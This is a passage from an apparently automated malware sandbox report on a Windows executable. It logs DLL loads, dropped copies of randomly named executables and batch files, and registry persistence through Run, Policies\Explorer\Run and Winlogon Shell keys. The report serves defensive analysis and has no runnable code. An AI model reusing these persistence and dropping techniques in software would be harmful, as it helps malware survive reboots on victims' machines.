Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: apphelp.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: edgegdi.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: windows.storage.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: wldp.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: uxtheme.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: propsys.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: dlnashext.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: wpdshext.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: profapi.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: edputil.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: urlmon.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: iertutil.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: srvcli.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: netutils.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: sspicli.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: wintypes.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: appresolver.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: bcp47langs.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: slc.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: userenv.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: sppc.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: apphelp.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeSection loaded: edgegdi.dll
Source: C:\Windows\mjvsikbqngeunkjyurda.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: edgegdi.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: windows.storage.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: wldp.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: uxtheme.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: propsys.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: apphelp.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: dlnashext.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: wpdshext.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: profapi.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: edputil.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: urlmon.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: iertutil.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: srvcli.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: netutils.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: sspicli.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: wintypes.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: appresolver.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: bcp47langs.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: slc.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: userenv.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: sppc.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\yrzsecpaticodwrc.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040A949 InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0040A949
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004223C7 push ecx; ret 2_2_004223D7
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00421DF0 push eax; ret 2_2_00421E04
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00421DF0 push eax; ret 2_2_00421E2C
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_004223C7 push ecx; ret 4_2_004223D7
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00421DF0 push eax; ret 4_2_00421E04
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00421DF0 push eax; ret 4_2_00421E2C
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_004223C7 push ecx; ret 5_2_004223D7
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00421DF0 push eax; ret 5_2_00421E04
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00421DF0 push eax; ret 5_2_00421E2C
Source: C:\Windows\ojtoccrezqmarmjwql.exeCode function: 6_2_004050C0 push eax; ret 6_2_004050D4
Source: C:\Windows\ojtoccrezqmarmjwql.exeCode function: 6_2_004050C0 push eax; ret 6_2_004050FC
Source: C:\Windows\ojtoccrezqmarmjwql.exeCode function: 6_2_00404F97 push ecx; ret 6_2_00404FA7
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_004223C7 push ecx; ret 19_2_004223D7
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00421DF0 push eax; ret 19_2_00421E04
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00421DF0 push eax; ret 19_2_00421E2C

Persistence and Installation Behavior

barindex
Source: unknownExecutable created and started: C:\Windows\ojtoccrezqmarmjwql.exe
Source: unknownExecutable created and started: C:\Windows\yrzsecpaticodwrc.exe
Source: unknownExecutable created and started: C:\Windows\mjvsikbqngeunkjyurda.exe
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\srfewatkjeewrqrigftsko.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\RCX70EC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\ylnagyfkxg.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Users\user\AppData\Local\Temp\zjisvko.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\yrzsecpaticodwrc.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\qfjygajqfqgo.batJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\bzmkbewmkeduommczxkiz.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\ojtoccrezqmarmjwql.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\fzicpocoiytgwqmyr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\ojtoccrezqmarmjwql.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\mjvsikbqngeunkjyurda.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\zvgcrsiwskhwokiwrny.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\fzicpocoiytgwqmyr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\srfewatkjeewrqrigftsko.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\ylnagyfkxg.batJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\yrzsecpaticodwrc.exeJump to dropped file
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\zvgcrsiwskhwokiwrny.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\qhneokveviakxo.batJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\mjvsikbqngeunkjyurda.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\bzmkbewmkeduommczxkiz.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\srfewatkjeewrqrigftsko.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\zvgcrsiwskhwokiwrny.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\fzicpocoiytgwqmyr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\srfewatkjeewrqrigftsko.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\yrzsecpaticodwrc.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\yrzsecpaticodwrc.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\zvgcrsiwskhwokiwrny.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\bzmkbewmkeduommczxkiz.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\ojtoccrezqmarmjwql.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\mjvsikbqngeunkjyurda.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\bzmkbewmkeduommczxkiz.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\fzicpocoiytgwqmyr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\ojtoccrezqmarmjwql.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\mjvsikbqngeunkjyurda.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\ylnagyfkxg.batJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\qfjygajqfqgo.batJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\qhneokveviakxo.batJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
